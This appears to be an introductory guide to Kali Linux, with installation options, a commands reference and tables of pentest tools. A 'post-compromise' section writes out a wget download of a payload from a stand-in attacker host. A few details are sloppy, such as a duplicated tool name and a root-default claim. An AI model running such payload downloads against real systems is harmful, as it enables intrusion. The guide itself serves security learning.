What Is Kali Linux?
Kali Linux is a Debian-based Linux distribution maintained by Offensive Security. It's specifically designed for digital forensics and penetration testing. It ships with over 600 pre-installed security tools, including the entire aircrack-ng suite, Metasploit Framework, Burp Suite, John the Ripper, sqlmap, nmap, and many more.
Kali is NOT a general-purpose operating system. It's a specialized tool for security professionals. Using it as your daily OS without proper understanding of Linux is not recommended.
Installation Methods
| Method | Pros | Cons | Best For |
|---|---|---|---|
| Virtual Machine (VM) | Easy setup, snapshot/restore, isolation | No direct hardware access (needs USB passthrough for WiFi) | Learning, tool familiarization |
| Bare Metal | Full hardware access, best performance | Erases existing OS, complex dual-boot | Live testing, portable deployment |
| Raspberry Pi | Portable, battery-powered, cheap | Slower CPU, limited RAM on Pi 3 | Covert deployments, Evil Twin |
| Live USB (Persistence) | No install, portable, changes persist | Slower than bare metal | Occasional testing, emergency use |
Essential Commands Reference
# Package management $ sudo apt update && sudo apt upgrade -y # Update all packages $ sudo apt install package-name # Install a package # Network adapters $ ip link show # Show network interfaces $ iwconfig # Show wireless interfaces $ airmon-ng # Show wireless card status $ airmon-ng start wlan0 # Enable monitor mode # File and process management $ find / -name "*.conf" 2>/dev/null | head -20 # Find config files $ ps aux | grep hostapd # Find running processes $ systemctl status service-name # Check service status $ journalctl -u service-name -f # Follow service logs # File transfer (post-compromise) $ python3 -m http.server 8000 # Host a file server $ wget http://attacker.com/payload.exe # Download a file
Essential Tools Pre-Installed
| Category | Tools |
|---|---|
| WiFi Auditing | aircrack-ng, airmon-ng, airodump-ng, aireplay-ng, wash, reaver, bully, wifite, mana-toolkit |
| Network Scanning | nmap, masscan, netdiscover, arp-scan |
| Vulnerability Scanning | nikto, sqlmap, dirb, gobuster, Burp Suite |
| Exploitation | msfconsole, searchsploit, searchsploit, metasploit-framework |
| Password Attacks | hashcat, john, hydra, crunch, cupp |
| Packet Capture | Wireshark, tcpdump, bettercap, ettercap |
| Web Attacks | Burp Suite, SQLmap, XSStrike, BeEF |
Staying Updated
$ # Weekly update routine $ sudo apt update && sudo apt full-upgrade -y $ # Update Kali tools (Kali-specific) $ sudo apt install kali-linux-sdr kali-linux-wireless $ # Check for new Kali rolling release $ cat /etc/apt/sources.list.d/kali.list deb http://http.kali.org/kali kali-rolling main contrib non-free $ # Always run as root (Kali default) $ sudo -i